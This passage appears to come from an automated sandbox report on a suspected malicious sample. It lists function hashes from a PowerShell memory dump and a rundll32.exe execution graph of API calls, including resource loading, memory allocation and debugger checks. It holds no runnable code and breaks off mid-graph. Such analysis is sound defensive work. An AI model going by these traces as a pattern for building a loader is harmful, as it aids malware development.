                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c07b35fc9ace32cdabe604f70919b1c0e822dbb448bec9b5116573491c83c56
                                                                                                                                • Instruction ID: c4e5cfff19cc857abe3fb2bbed86a9380df8d0e791f1a8dae5dac449885896d3
                                                                                                                                • Opcode Fuzzy Hash: 9c07b35fc9ace32cdabe604f70919b1c0e822dbb448bec9b5116573491c83c56
                                                                                                                                • Instruction Fuzzy Hash: 9F61D627A0D1625BE721B76DB8D20D67B50EF43335714C0B7D9C88E4A3EA19688FD7A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A30D7F, Relevance: .2, Instructions: 237COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d6580ae153f581f3543fea1a3bb14e1319bb646074eb841b8cf6e224b416451c
                                                                                                                                • Instruction ID: 74993cc20697c57f5dc61392343114492abbdbca87ee43a751a6226b11aaeeee
                                                                                                                                • Opcode Fuzzy Hash: d6580ae153f581f3543fea1a3bb14e1319bb646074eb841b8cf6e224b416451c
                                                                                                                                • Instruction Fuzzy Hash: 5461D627A0D1625BE720B76DB8D60D67B50EF43331724C0B7D988CE493EA19684BD7A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFA34A30D30, Relevance: .2, Instructions: 227COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.702180453.00007FFA34A30000.00000040.00000001.sdmp, Offset: 00007FFA34A30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_7ffa34a30000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2dc5089cc21962e91611c27e47fb7a62693508ccf7d74e5d9dea90b703786c58
                                                                                                                                • Instruction ID: 5a5e1c54b87a7af32270eeeaffbbbfff5d2cc98eae024d2fdbad759650788c95
                                                                                                                                • Opcode Fuzzy Hash: 2dc5089cc21962e91611c27e47fb7a62693508ccf7d74e5d9dea90b703786c58
                                                                                                                                • Instruction Fuzzy Hash: 55513A32E1C6554FE7289F6CA4C55B277D1EB8A320B14C57FE88EC7197EE2978458380
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Analysis Process: rundll32.exe PID: 6728 Parent PID: 6760 rundll32.exeCOMMON

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:15.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:6.3%
                                                                                                                                Total number of Nodes:1516
                                                                                                                                Total number of Limit Nodes:26

                                                                                                                                Graph

                                                                                                                                execution_graph 10922 10015810 TlsFree 9942 10002460 9997 10001720 9942->9997 9944 100024c7 9945 10001720 std::_String_base::_Xlen 77 API calls 9944->9945 9946 100024ef 9945->9946 9947 10001720 std::_String_base::_Xlen 77 API calls 9946->9947 9948 10002517 9947->9948 10009 10001b80 9948->10009 9950 10002539 9951 10001b80 77 API calls 9950->9951 9952 1000254a ctype 9951->9952 9953 10002565 LoadLibraryA 9952->9953 9954 10001720 std::_String_base::_Xlen 77 API calls 9953->9954 9955 1000259c 9954->9955 9956 10001720 std::_String_base::_Xlen 77 API calls 9955->9956 9957 100025be 9956->9957 9958 10001720 std::_String_base::_Xlen 77 API calls 9957->9958 9959 100025e6 9958->9959 9960 10001720 std::_String_base::_Xlen 77 API calls 9959->9960 9961 1000260e 9960->9961 9962 10001b80 77 API calls 9961->9962 9963 10002635 9962->9963 9964 10001b80 77 API calls 9963->9964 9965 10002643 9964->9965 9966 10001b80 77 API calls 9965->9966 9968 10002654 ctype 9966->9968 9967 10002689 1100 API calls 9969 100037cf 9967->9969 9968->9967 10016 10001050 GetCurrentProcess VirtualAllocExNuma 9969->10016 9971 100037de GetProcAddress 9972 10003804 9971->9972 9973 1000380b GetProcAddress LdrFindResource_U 9971->9973 9972->9973 9974 10003833 LdrAccessResource 9973->9974 9975 1000384d WriteFileGather 9973->9975 9974->9975 9976 100039e7 9975->9976 9995 10003860 ctype 9975->9995 10018 10007666 9976->10018 9978 100039f1 9979 10007666 93 API calls 9978->9979 9980 100039ff 9979->9980 9981 10007666 93 API calls 9980->9981 9982 10003a0b VirtualAlloc 9981->9982 9983 10003a30 __setlocale_set_cat 9982->9983 9984 10001140 69 API calls 9983->9984 9985 10003a41 9984->9985 9987 10002330 115 API calls 9985->9987 9989 10003a51 9987->9989 9988 10003c16 9990 100047b0 26 API calls 9989->9990 9991 10003a63 9990->9991 9992 10004380 SetLastError SetLastError SetLastError SetLastError 9991->9992 9993 10003a72 9992->9993 9994 10003a74 MessageBoxA 9993->9994 9994->9995 9996 100039af ctype 9995->9996 9996->9995 10021 10007528 9996->10021 9998 10001773 9997->9998 10002 1000172d 9997->10002 9999 10001781 9998->9999 10045 1000481d 9998->10045 10004 10001794 9999->10004 10053 10001300 9999->10053 10002->9998 10005 10001756 10002->10005 10003 100017ac 10003->9944 10004->10003 10059 100068d7 10004->10059 10029 10001640 10005->10029 10008 1000176d 10008->9944 10010 10001640 ctype 77 API calls 10009->10010 10011 10001bcc 10010->10011 10601 10001530 10011->10601 10014 10001640 ctype 77 API calls 10015 10001bfd ctype 10014->10015 10015->9950 10017 10001074 __setlocale_set_cat 10016->10017 10017->9971 10019 10007650 10018->10019 10613 1000db09 10019->10613 10022 10007530 10021->10022 10023 10007532 IsDebuggerPresent 10021->10023 10022->9988 10921 1000cb48 10023->10921 10026 1000cd39 SetUnhandledExceptionFilter UnhandledExceptionFilter 10027 1000cd56 __invoke_watson 10026->10027 10028 1000cd5e GetCurrentProcess TerminateProcess 10026->10028 10027->10028 10028->9988 10030 10001653 10029->10030 10031 10001658 10029->10031 10068 10004855 10030->10068 10033 1000168a 10031->10033 10034 1000166b 10031->10034 10036 10001694 10033->10036 10038 1000481d std::_String_base::_Xlen 77 API calls 10033->10038 10076 10001270 10034->10076 10041 10001300 std::_String_base::_Xlen 77 API calls 10036->10041 10043 100016a7 10036->10043 10038->10036 10039 100016ba 10039->10008 10040 10001270 ctype 77 API calls 10042 10001681 10040->10042 10041->10043 10042->10008 10043->10039 10044 100068d7 _memcpy_s 69 API calls 10043->10044 10044->10039 10046 10004829 __EH_prolog3 10045->10046 10047 10001aa0 std::_String_base::_Xlen 77 API calls 10046->10047 10048 10004836 10047->10048 10299 100018d0 10048->10299 10051 10006b9c __CxxThrowException@8 RaiseException 10052 10004854 10051->10052 10054 1000133d 10053->10054 10302 100010c0 10054->10302 10056 100013c9 ctype 10056->10004 10058 100068d7 _memcpy_s 69 API calls 10058->10056 10062 100068e7 __setlocale_set_cat 10059->10062 10064 100068eb _memset 10059->10064 10060 100068f0 10061 1000b02e _fputc 69 API calls 10060->10061 10063 100068f5 10061->10063 10062->10003 10065 1000708c _fputc 7 API calls 10063->10065 10064->10060 10064->10062 10066 1000693a 10064->10066 10065->10062 10066->10062 10067 1000b02e _fputc 69 API calls 10066->10067 10067->10063 10069 10004861 __EH_prolog3 10068->10069 10082 10001aa0 10069->10082 10075 1000488c 10077 1000127e 10076->10077 10080 10001283 10076->10080 10078 10004855 ctype 77 API calls 10077->10078 10078->10080 10079 100012d2 10079->10040 10080->10079 10096 10006954 10080->10096 10083 10001ac0 10082->10083 10083->10083 10084 10001720 std::_String_base::_Xlen 77 API calls 10083->10084 10085 10001ad2 10084->10085 10086 100018f0 10085->10086 10092 10001860 10086->10092 10089 10006b9c 10090 10006bd1 RaiseException 10089->10090 10091 10006bc5 10089->10091 10090->10075 10091->10090 10093 1000188d std::_String_base::_Xlen 10092->10093 10094 10001640 ctype 77 API calls 10093->10094 10095 100018b6 10094->10095 10095->10089 10097 10006964 10096->10097 10098 1000697d 10096->10098 10099 10006969 10097->10099 10101 10006989 10097->10101 10098->10079 10108 1000b02e 10099->10108 10103 1000699c 10101->10103 10104 1000698e 10101->10104 10102 1000696e 10111 1000708c 10102->10111 10114 1000ba70 10103->10114 10105 1000b02e _fputc 69 API calls 10104->10105 10105->10102 10118 1000c36a GetLastError 10108->10118 10110 1000b033 10110->10102 10112 1000c197 __decode_pointer 7 API calls 10111->10112 10113 1000709c __invoke_watson 10112->10113 10115 1000ba88 10114->10115 10116 1000baaf __VEC_memcpy 10115->10116 10117 1000bab7 10115->10117 10116->10117 10117->10098 10132 1000c212 TlsGetValue 10118->10132 10120 1000c3d7 SetLastError 10120->10110 10126 1000c3b6 10155 1000c283 10126->10155 10127 1000c3ce 10173 100088c4 10127->10173 10130 1000c3be GetCurrentThreadId 10130->10120 10131 1000c3d4 10131->10120 10133 1000c242 10132->10133 10134 1000c227 10132->10134 10133->10120 10137 10009e8c 10133->10137 10135 1000c197 __decode_pointer 7 API calls 10134->10135 10136 1000c232 TlsSetValue 10135->10136 10136->10133 10140 10009e95 10137->10140 10139 10009ed2 10139->10120 10143 1000c197 TlsGetValue 10139->10143 10140->10139 10141 10009eb3 Sleep 10140->10141 10186 100104b1 10140->10186 10142 10009ec8 10141->10142 10142->10139 10142->10140 10144 1000c1d0 GetModuleHandleW 10143->10144 10145 1000c1af 10143->10145 10146 1000c1e0 10144->10146 10147 1000c1eb GetProcAddress 10144->10147 10145->10144 10148 1000c1b9 TlsGetValue 10145->10148 10263 1000b5ad 10146->10263 10150 1000c1c8 10147->10150 10154 1000c1c4 10148->10154 10152 1000c203 10150->10152 10153 1000c1fb RtlDecodePointer 10150->10153 10152->10126 10152->10127 10153->10152 10154->10144 10154->10150 10267 1000b078 10155->10267 10157 1000c28f GetModuleHandleW 10158 1000c2a5 10157->10158 10159 1000c29f 10157->10159 10161 1000c2e1 10158->10161 10162 1000c2bd GetProcAddress GetProcAddress 10158->10162 10160 1000b5ad __crt_waiting_on_module_handle 2 API calls 10159->10160 10160->10158 10163 1000ba3c __lock 65 API calls 10161->10163 10162->10161 10164 1000c300 InterlockedIncrement 10163->10164 10268 1000c358 10164->10268 10167 1000ba3c __lock 65 API calls 10168 1000c321 10167->10168 10271 1000a186 InterlockedIncrement 10168->10271 10170 1000c33f 10283 1000c361 10170->10283 10172 1000c34c _flsall 10172->10130 10174 100088d0 _flsall 10173->10174 10175 10008949 __dosmaperr _flsall 10174->10175 10177 1000ba3c __lock 67 API calls 10174->10177 10185 1000890f 10174->10185 10175->10131 10176 10008924 HeapFree 10176->10175 10178 10008936 10176->10178 10182 100088e7 ___sbh_find_block 10177->10182 10179 1000b02e _fputc 67 API calls 10178->10179 10180 1000893b GetLastError 10179->10180 10180->10175 10181 10008901 10295 1000891a 10181->10295 10182->10181 10288 1000cda2 10182->10288 10185->10175 10185->10176 10187 100104bd _flsall 10186->10187 10188 100104d5 10187->10188 10198 100104f4 _memset 10187->10198 10189 1000b02e _fputc 68 API calls 10188->10189 10190 100104da 10189->10190 10192 1000708c _fputc 7 API calls 10190->10192 10191 10010566 RtlAllocateHeap 10191->10198 10193 100104ea _flsall 10192->10193 10193->10140 10198->10191 10198->10193 10199 1000ba3c 10198->10199 10206 1000d551 10198->10206 10212 100105ad 10198->10212 10215 1000cb5f 10198->10215 10200 1000ba51 10199->10200 10201 1000ba64 EnterCriticalSection 10199->10201 10218 1000b979 10200->10218 10201->10198 10203 1000ba57 10203->10201 10244 1000b5dd 10203->10244 10208 1000d57f 10206->10208 10207 1000d618 10211 1000d621 10207->10211 10258 1000d168 10207->10258 10208->10207 10208->10211 10251 1000d0b8 10208->10251 10211->10198 10262 1000b962 LeaveCriticalSection 10212->10262 10214 100105b4 10214->10198 10216 1000c197 __decode_pointer 7 API calls 10215->10216 10217 1000cb6f 10216->10217 10217->10198 10219 1000b985 _flsall 10218->10219 10220 1000b9ab 10219->10220 10221 1000c0e3 __FF_MSGBANNER 69 API calls 10219->10221 10222 10009e47 __malloc_crt 69 API calls 10220->10222 10228 1000b9bb _flsall 10220->10228 10223 1000b99a 10221->10223 10224 1000b9c6 10222->10224 10225 1000bf38 __NMSG_WRITE 69 API calls 10223->10225 10226 1000b9dc 10224->10226 10227 1000b9cd 10224->10227 10229 1000b9a1 10225->10229 10231 1000ba3c __lock 69 API calls 10226->10231 10230 1000b02e _fputc 69 API calls 10227->10230 10228->10203 10232 1000b631 __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 10229->10232 10230->10228 10233 1000b9e3 10231->10233 10232->10220 10234 1000ba17 10233->10234 10235 1000b9eb 10233->10235 10236 100088c4 __setlocale_set_cat 69 API calls 10234->10236 10237 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 10235->10237 10238 1000ba08 10236->10238 10239 1000b9f6 10237->10239 10240 1000ba33 __mtinitlocknum LeaveCriticalSection 10238->10240 10239->10238 10241 100088c4 __setlocale_set_cat 69 API calls 10239->10241 10240->10228 10242 1000ba02 10241->10242 10243 1000b02e _fputc 69 API calls 10242->10243 10243->10238 10245 1000c0e3 __FF_MSGBANNER 69 API calls 10244->10245 10246 1000b5e7 10245->10246 10247 1000bf38 __NMSG_WRITE 69 API calls 10246->10247 10248 1000b5ef 10247->10248 10249 1000c197 __decode_pointer 7 API calls 10248->10249 10250 1000b5fa 10249->10250 10250->10201 10252 1000d0cb HeapReAlloc 10251->10252 10253 1000d0ff HeapAlloc 10251->10253 10255 1000d0e9 10252->10255 10256 1000d0ed 10252->10256 10254 1000d122 VirtualAlloc 10253->10254 10253->10255 10254->10255 10257 1000d13c HeapFree 10254->10257 10255->10207 10256->10253 10257->10255 10259 1000d17f VirtualAlloc 10258->10259 10261 1000d1c6 10259->10261 10261->10211 10262->10214 10264 1000b5b8 Sleep GetModuleHandleW 10263->10264 10265 1000b5d6 10264->10265 10266 1000b5da 10264->10266 10265->10264 10265->10266 10266->10147 10266->10152 10267->10157 10286 1000b962 LeaveCriticalSection 10268->10286 10270 1000c31a 10270->10167 10272 1000a1a4 InterlockedIncrement 10271->10272 10273 1000a1a7 10271->10273 10272->10273 10274 1000a1b1 InterlockedIncrement 10273->10274 10275 1000a1b4 10273->10275 10274->10275 10276 1000a1c1 10275->10276 10277 1000a1be InterlockedIncrement 10275->10277 10278 1000a1cb InterlockedIncrement 10276->10278 10280 1000a1ce 10276->10280 10277->10276 10278->10280 10279 1000a1e7 InterlockedIncrement 10279->10280 10280->10279 10281 1000a1f7 InterlockedIncrement 10280->10281 10282 1000a202 InterlockedIncrement 10280->10282 10281->10280 10282->10170 10287 1000b962 LeaveCriticalSection 10283->10287 10285 1000c368 10285->10172 10286->10270 10287->10285 10289 1000cde1 10288->10289 10294 1000d083 10288->10294 10290 1000cfcd VirtualFree 10289->10290 10289->10294 10291 1000d031 10290->10291 10292 1000d040 VirtualFree HeapFree 10291->10292 10291->10294 10293 1000ba70 ___BuildCatchObjectHelper __VEC_memcpy 10292->10293 10293->10294 10294->10181 10298 1000b962 LeaveCriticalSection 10295->10298 10297 10008921 10297->10185 10298->10297 10300 10001860 std::_String_base::_Xlen 77 API calls 10299->10300 10301 100018dd 10300->10301 10301->10051 10303 100010da 10302->10303 10304 100010cb 10302->10304 10303->10304 10305 100010e6 10303->10305 10312 100070dd 10304->10312 10324 100069c2 10305->10324 10310 10006b9c __CxxThrowException@8 RaiseException 10311 10001113 10310->10311 10315 100070e7 10312->10315 10314 100010d3 10314->10056 10314->10058 10315->10314 10316 1000cb5f __calloc_impl 7 API calls 10315->10316 10319 10007103 std::bad_alloc::bad_alloc 10315->10319 10330 10007586 10315->10330 10316->10315 10323 10007129 10319->10323 10348 100077b8 10319->10348 10320 10006b9c __CxxThrowException@8 RaiseException 10322 10007141 10320->10322 10351 10001120 10323->10351 10325 100010fc 10324->10325 10326 100069db _strlen 10324->10326 10325->10310 10327 10007586 _malloc 69 API calls 10326->10327 10328 100069ea 10327->10328 10328->10325 10329 1000bdd5 _strcpy_s 69 API calls 10328->10329 10329->10325 10331 10007639 10330->10331 10341 10007598 10330->10341 10332 1000cb5f __calloc_impl 7 API calls 10331->10332 10333 1000763f 10332->10333 10335 1000b02e _fputc 68 API calls 10333->10335 10347 10007631 10335->10347 10338 100075f5 RtlAllocateHeap 10338->10341 10339 100075a9 10339->10341 10354 1000c0e3 10339->10354 10363 1000bf38 10339->10363 10397 1000b631 10339->10397 10341->10338 10341->10339 10342 10007625 10341->10342 10343 1000cb5f __calloc_impl 7 API calls 10341->10343 10345 1000762a 10341->10345 10341->10347 10400 10007537 10341->10400 10344 1000b02e _fputc 68 API calls 10342->10344 10343->10341 10344->10345 10346 1000b02e _fputc 68 API calls 10345->10346 10346->10347 10347->10315 10499 1000777c 10348->10499 10350 100077c5 10350->10323 10595 10006a32 10351->10595 10408 10013d64 10354->10408 10357 10013d64 __set_error_mode 69 API calls 10360 1000c0f7 10357->10360 10358 1000bf38 __NMSG_WRITE 69 API calls 10359 1000c10f 10358->10359 10361 1000bf38 __NMSG_WRITE 69 API calls 10359->10361 10360->10358 10362 1000c119 10360->10362 10361->10362 10362->10339 10364 1000bf4c 10363->10364 10365 10013d64 __set_error_mode 66 API calls 10364->10365 10396 1000c0a7 10364->10396 10366 1000bf6e 10365->10366 10367 1000c0ac GetStdHandle 10366->10367 10369 10013d64 __set_error_mode 66 API calls 10366->10369 10368 1000c0ba _strlen 10367->10368 10367->10396 10372 1000c0d3 WriteFile 10368->10372 10368->10396 10370 1000bf7f 10369->10370 10370->10367 10371 1000bf91 10370->10371 10371->10396 10414 1000bdd5 10371->10414 10372->10396 10375 1000bfc7 GetModuleFileNameA 10376 1000bfe5 10375->10376 10381 1000c008 _strlen 10375->10381 10378 1000bdd5 _strcpy_s 66 API calls 10376->10378 10380 1000bff5 10378->10380 10380->10381 10382 10006f64 __invoke_watson 10 API calls 10380->10382 10392 1000c04b 10381->10392 10430 10011646 10381->10430 10382->10381 10385 1000c06f 10389 1001158b _strcat_s 66 API calls 10385->10389 10388 10006f64 __invoke_watson 10 API calls 10388->10385 10390 1000c083 10389->10390 10393 1000c094 10390->10393 10394 10006f64 __invoke_watson 10 API calls 10390->10394 10391 10006f64 __invoke_watson 10 API calls 10391->10392 10439 1001158b 10392->10439 10448 10013bfb 10393->10448 10394->10393 10396->10339 10492 1000b606 GetModuleHandleW 10397->10492 10401 10007543 _flsall 10400->10401 10402 1000ba3c __lock 69 API calls 10401->10402 10403 10007574 _flsall 10401->10403 10404 10007559 10402->10404 10403->10341 10405 1000d551 ___sbh_alloc_block 5 API calls 10404->10405 10406 10007564 10405->10406 10495 1000757d 10406->10495 10409 10013d73 10408->10409 10410 1000b02e _fputc 69 API calls 10409->10410 10413 1000c0ea 10409->10413 10411 10013d96 10410->10411 10412 1000708c _fputc 7 API calls 10411->10412 10412->10413 10413->10357 10413->10360 10415 1000bde6 10414->10415 10416 1000bded 10414->10416 10415->10416 10419 1000be13 10415->10419 10417 1000b02e _fputc 69 API calls 10416->10417 10418 1000bdf2 10417->10418 10420 1000708c _fputc 7 API calls 10418->10420 10421 1000be01 10419->10421 10422 1000b02e _fputc 69 API calls 10419->10422 10420->10421 10421->10375 10423 10006f64 10421->10423 10422->10418 10475 100077d0 10423->10475 10425 10006f91 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10426 10007061 __invoke_watson 10425->10426 10427 1000706d GetCurrentProcess TerminateProcess 10425->10427 10426->10427 10428 10007528 __setlocale_set_cat 5 API calls 10427->10428 10429 1000708a 10428->10429 10429->10375 10435 10011658 10430->10435 10431 1001165c 10432 1000c038 10431->10432 10433 1000b02e _fputc 69 API calls 10431->10433 10432->10391 10432->10392 10434 10011678 10433->10434 10436 1000708c _fputc 7 API calls 10434->10436 10435->10431 10435->10432 10437 100116a2 10435->10437 10436->10432 10437->10432 10438 1000b02e _fputc 69 API calls 10437->10438 10438->10434 10440 100115a3 10439->10440 10441 1001159c 10439->10441 10442 1000b02e _fputc 69 API calls 10440->10442 10441->10440 10445 100115d7 10441->10445 10443 100115a8 10442->10443 10444 1000708c _fputc 7 API calls 10443->10444 10446 1000c05e 10444->10446 10445->10446 10447 1000b02e _fputc 69 API calls 10445->10447 10446->10385 10446->10388 10447->10443 10477 1000c18e 10448->10477 10451 10013c1e LoadLibraryA 10452 10013c33 GetProcAddress 10451->10452 10453 10013d48 10451->10453 10452->10453 10455 10013c49 10452->10455 10453->10396 10454 10013ca6 10458 1000c197 __decode_pointer 7 API calls 10454->10458 10474 10013cd0 10454->10474 10480 1000c11c TlsGetValue 10455->10480 10456 1000c197 __decode_pointer 7 API calls 10456->10453 10457 1000c197 __decode_pointer 7 API calls 10461 10013d13 10457->10461 10462 10013cc3 10458->10462 10469 1000c197 __decode_pointer 7 API calls 10461->10469 10471 10013cfb 10461->10471 10464 1000c197 __decode_pointer 7 API calls 10462->10464 10463 1000c11c __encode_pointer 7 API calls 10465 10013c64 GetProcAddress 10463->10465 10464->10474 10466 1000c11c __encode_pointer 7 API calls 10465->10466 10467 10013c79 GetProcAddress 10466->10467 10468 1000c11c __encode_pointer 7 API calls 10467->10468 10470 10013c8e 10468->10470 10469->10471 10470->10454 10472 10013c98 GetProcAddress 10470->10472 10471->10456 10473 1000c11c __encode_pointer 7 API calls 10472->10473 10473->10454 10474->10457 10474->10471 10476 100077dc __VEC_memzero 10475->10476 10476->10425 10478 1000c11c __encode_pointer 7 API calls 10477->10478 10479 1000c195 10478->10479 10479->10451 10479->10454 10481 1000c134 10480->10481 10482 1000c155 GetModuleHandleW 10480->10482 10481->10482 10483 1000c13e TlsGetValue 10481->10483 10484 1000c170 GetProcAddress 10482->10484 10485 1000c165 10482->10485 10490 1000c149 10483->10490 10486 1000c14d 10484->10486 10487 1000b5ad __crt_waiting_on_module_handle 2 API calls 10485->10487 10488 1000c180 RtlEncodePointer 10486->10488 10489 1000c188 GetProcAddress 10486->10489 10491 1000c16b 10487->10491 10488->10489 10489->10463 10490->10482 10490->10486 10491->10484 10491->10489 10493 1000b61a GetProcAddress 10492->10493 10494 1000b62a ExitProcess 10492->10494 10493->10494 10498 1000b962 LeaveCriticalSection 10495->10498 10497 10007584 10497->10403 10498->10497 10500 10007788 _flsall 10499->10500 10507 1000b649 10500->10507 10506 100077a9 _flsall 10506->10350 10508 1000ba3c __lock 69 API calls 10507->10508 10509 1000778d 10508->10509 10510 10007691 10509->10510 10511 1000c197 __decode_pointer 7 API calls 10510->10511 10512 100076a5 10511->10512 10513 1000c197 __decode_pointer 7 API calls 10512->10513 10514 100076b5 10513->10514 10515 10007738 10514->10515 10530 1000dbac 10514->10530 10527 100077b2 10515->10527 10517 1000c11c __encode_pointer 7 API calls 10518 1000772d 10517->10518 10521 1000c11c __encode_pointer 7 API calls 10518->10521 10519 100076f7 10519->10515 10523 10009ed8 __realloc_crt 75 API calls 10519->10523 10524 1000770d 10519->10524 10520 100076d3 10520->10519 10526 1000771f 10520->10526 10543 10009ed8 10520->10543 10521->10515 10523->10524 10524->10515 10525 1000c11c __encode_pointer 7 API calls 10524->10525 10525->10526 10526->10517 10591 1000b652 10527->10591 10531 1000dbb8 _flsall 10530->10531 10532 1000dbe5 10531->10532 10533 1000dbc8 10531->10533 10534 1000dc26 HeapSize 10532->10534 10536 1000ba3c __lock 69 API calls 10532->10536 10535 1000b02e _fputc 69 API calls 10533->10535 10537 1000dbdd _flsall 10534->10537 10538 1000dbcd 10535->10538 10539 1000dbf5 ___sbh_find_block 10536->10539 10537->10520 10540 1000708c _fputc 7 API calls 10538->10540 10548 1000dc46 10539->10548 10540->10537 10545 10009ee1 10543->10545 10546 10009f20 10545->10546 10547 10009f01 Sleep 10545->10547 10552 100105cf 10545->10552 10546->10519 10547->10545 10551 1000b962 LeaveCriticalSection 10548->10551 10550 1000dc21 10550->10534 10550->10537 10551->10550 10553 100105db _flsall 10552->10553 10554 100105f0 10553->10554 10555 100105e2 10553->10555 10557 10010603 10554->10557 10558 100105f7 10554->10558 10556 10007586 _malloc 69 API calls 10555->10556 10573 100105ea __dosmaperr _flsall 10556->10573 10565 10010775 10557->10565 10586 10010610 __setlocale_set_cat ___sbh_resize_block ___sbh_find_block 10557->10586 10559 100088c4 __setlocale_set_cat 69 API calls 10558->10559 10559->10573 10560 100107a8 10561 1000cb5f __calloc_impl 7 API calls 10560->10561 10564 100107ae 10561->10564 10562 1000ba3c __lock 69 API calls 10562->10586 10563 1001077a HeapReAlloc 10563->10565 10563->10573 10567 1000b02e _fputc 69 API calls 10564->10567 10565->10560 10565->10563 10566 100107cc 10565->10566 10568 1000cb5f __calloc_impl 7 API calls 10565->10568 10570 100107c2 10565->10570 10569 1000b02e _fputc 69 API calls 10566->10569 10566->10573 10567->10573 10568->10565 10571 100107d5 GetLastError 10569->10571 10574 1000b02e _fputc 69 API calls 10570->10574 10571->10573 10573->10545 10576 10010743 10574->10576 10575 1001069b HeapAlloc 10575->10586 10576->10573 10577 10010748 GetLastError 10576->10577 10577->10573 10578 100106f0 HeapReAlloc 10578->10586 10579 1000d551 ___sbh_alloc_block 5 API calls 10579->10586 10580 1001075b 10580->10573 10582 1000b02e _fputc 69 API calls 10580->10582 10581 1000cb5f __calloc_impl 7 API calls 10581->10586 10584 10010768 10582->10584 10583 1001073e 10585 1000b02e _fputc 69 API calls 10583->10585 10584->10571 10584->10573 10585->10576 10586->10560 10586->10562 10586->10573 10586->10575 10586->10578 10586->10579 10586->10580 10586->10581 10586->10583 10587 1000cda2 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 10586->10587 10588 10010713 10586->10588 10587->10586 10589 1000b962 _doexit LeaveCriticalSection 10588->10589 10590 1001071a 10589->10590 10590->10586 10594 1000b962 LeaveCriticalSection 10591->10594 10593 100077b7 10593->10506 10594->10593 10596 1000112d 10595->10596 10597 10006a52 _strlen 10595->10597 10596->10320 10597->10596 10598 10007586 _malloc 69 API calls 10597->10598 10599 10006a65 10598->10599 10599->10596 10600 1000bdd5 _strcpy_s 69 API calls 10599->10600 10600->10596 10602 10001543 10601->10602 10603 10001548 10601->10603 10604 10004855 ctype 77 API calls 10602->10604 10605 1000156f 10603->10605 10606 1000481d std::_String_base::_Xlen 77 API calls 10603->10606 10604->10603 10607 10001586 10605->10607 10608 1000481d std::_String_base::_Xlen 77 API calls 10605->10608 10612 100015b0 10605->10612 10606->10605 10609 10001300 std::_String_base::_Xlen 77 API calls 10607->10609 10610 10001599 10607->10610 10608->10607 10609->10610 10611 100068d7 _memcpy_s 69 API calls 10610->10611 10610->10612 10611->10612 10612->10014 10614 1000db22 10613->10614 10617 1000d8da 10614->10617 10629 10009442 10617->10629 10619 1000d901 10620 1000b02e _fputc 69 API calls 10619->10620 10623 1000d906 10620->10623 10622 1000d93e 10626 1000d983 10622->10626 10637 100101fd 10622->10637 10624 1000708c _fputc 7 API calls 10623->10624 10628 1000d916 10624->10628 10627 1000b02e _fputc 69 API calls 10626->10627 10626->10628 10627->10628 10630 10009455 10629->10630 10636 100094a2 10629->10636 10644 1000c3e3 10630->10644 10633 10009482 10633->10636 10664 1000fb43 10633->10664 10636->10619 10636->10622 10638 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 10637->10638 10639 10010211 10638->10639 10640 1001021e 10639->10640 10852 100137e6 10639->10852 10640->10622 10645 1000c36a __getptd_noexit 69 API calls 10644->10645 10646 1000c3eb 10645->10646 10647 1000945a 10646->10647 10648 1000b5dd __amsg_exit 69 API calls 10646->10648 10647->10633 10649 1000a312 10647->10649 10648->10647 10650 1000a31e _flsall 10649->10650 10651 1000c3e3 __getptd 69 API calls 10650->10651 10653 1000a323 10651->10653 10652 1000a351 10654 1000ba3c __lock 69 API calls 10652->10654 10653->10652 10655 1000a335 10653->10655 10657 1000a358 10654->10657 10656 1000c3e3 __getptd 69 API calls 10655->10656 10658 1000a33a 10656->10658 10680 1000a2d4 10657->10680 10661 1000a348 _flsall 10658->10661 10663 1000b5dd __amsg_exit 69 API calls 10658->10663 10661->10633 10663->10661 10665 1000fb4f _flsall 10664->10665 10666 1000c3e3 __getptd 69 API calls 10665->10666 10667 1000fb54 10666->10667 10668 1000fb66 10667->10668 10669 1000ba3c __lock 69 API calls 10667->10669 10672 1000fb74 _flsall 10668->10672 10676 1000b5dd __amsg_exit 69 API calls 10668->10676 10670 1000fb84 10669->10670 10671 1000fbcd 10670->10671 10673 1000fbb5 InterlockedIncrement 10670->10673 10674 1000fb9b InterlockedDecrement 10670->10674 10848 1000fbde 10671->10848 10672->10636 10673->10671 10674->10673 10677 1000fba6 10674->10677 10676->10672 10677->10673 10678 100088c4 __setlocale_set_cat 69 API calls 10677->10678 10679 1000fbb4 10678->10679 10679->10673 10681 1000a2d8 10680->10681 10682 1000a30a 10680->10682 10681->10682 10683 1000a186 ___addlocaleref 8 API calls 10681->10683 10688 1000a37c 10682->10688 10684 1000a2eb 10683->10684 10684->10682 10691 1000a215 10684->10691 10847 1000b962 LeaveCriticalSection 10688->10847 10690 1000a383 10690->10658 10692 1000a226 InterlockedDecrement 10691->10692 10693 1000a2a9 10691->10693 10694 1000a23b InterlockedDecrement 10692->10694 10695 1000a23e 10692->10695 10693->10682 10705 1000a03d 10693->10705 10694->10695 10696 